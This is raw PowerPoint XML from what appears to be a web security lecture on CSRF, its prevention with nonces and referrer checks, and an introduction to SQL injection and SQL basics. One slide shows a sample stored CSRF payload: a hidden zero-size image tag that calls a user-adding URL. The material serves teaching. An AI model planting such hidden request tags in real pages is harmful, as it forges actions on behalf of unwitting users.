                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reflected and stored</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10958474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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037771" y="557054"/>
            <a:ext cx="7391400" cy="536027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Stored CSRF attack example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630620" y="5665078"/>
            <a:ext cx="8132379" cy="961695"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Attack request payload resides in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Users are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to stored CSRF attacks than reflected attacks</a:t>
            </a:r>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344214" y="1240225"/>
            <a:ext cx="5257800" cy="4130565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2887717" y="2775511"/>
            <a:ext cx="2427891" cy="274320"/>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20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3447393" y="3723758"/>
            <a:ext cx="5443503" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=“http://www.xyz.com/users.php?x=0&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>add&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>joe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp; …”  width=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” height=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3743326" y="3408168"/>
            <a:ext cx="716675" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83805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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="609600"/>
            <a:ext cx="7543800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>CSRF Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2220686"/>
            <a:ext cx="8469086" cy="4027714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Add a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per-session nonce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to URL and all forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>A nonce is a random token generated once and remembered by the server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The idea is that an attacker will not be able to guess the token needed to make a valid request through victim’s click</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Checking the referrer in the client's HTTP request will prevent CSRF attacks. By ensuring the HTTP request have come from the original site means that the attacks from other sites will not function.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258344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457200" y="685800"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A snapshot of web security attack types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="Top attack method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2264544"/>
            <a:ext cx="8043862" cy="43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42938" y="1556658"/>
            <a:ext cx="8077200" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some common attacks are due to application vulnerabilities such as SQL injection and Cross-Site Scripting. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346936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304800" y="566057"/>
            <a:ext cx="8534400" cy="723900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Web application code-level security vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25605" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1915886"/>
            <a:ext cx="8305800" cy="4615543"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> in applications that allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of vulnerabilities are attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common example of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection (SQLI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="616817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828"/>
            <a:ext cx="8229600" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>SQL Injection (SQLI) vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1973943"/>
            <a:ext cx="8229600" cy="4699000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SQL queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> in applications with user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> may not be sanitized properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intended structure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of SQL queries are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>altered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>during application runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Authentication bypassing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Leakage of private information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60545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F360-9B0D-4DCD-835F-611524C860C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BRIEF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OVERVIEW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2CE460C-C3B6-4E4A-8969-C75ED52AD5BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Structured Query Language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows users to access data in the relational database management systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows users to describe the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows users to define the data in a database and manipulate that data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows users to create and drop databases and tables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Allows users to create and view, stored procedure, functions in a database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1912193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2470-4D42-4599-B020-DA4E9F5895F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB42CFDC-D902-41AF-B430-8C48672BF3C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All the usual:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Int, decimal, float, real, etc..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strings (vary depending on DBMS) but:</a:t>
            </a:r>
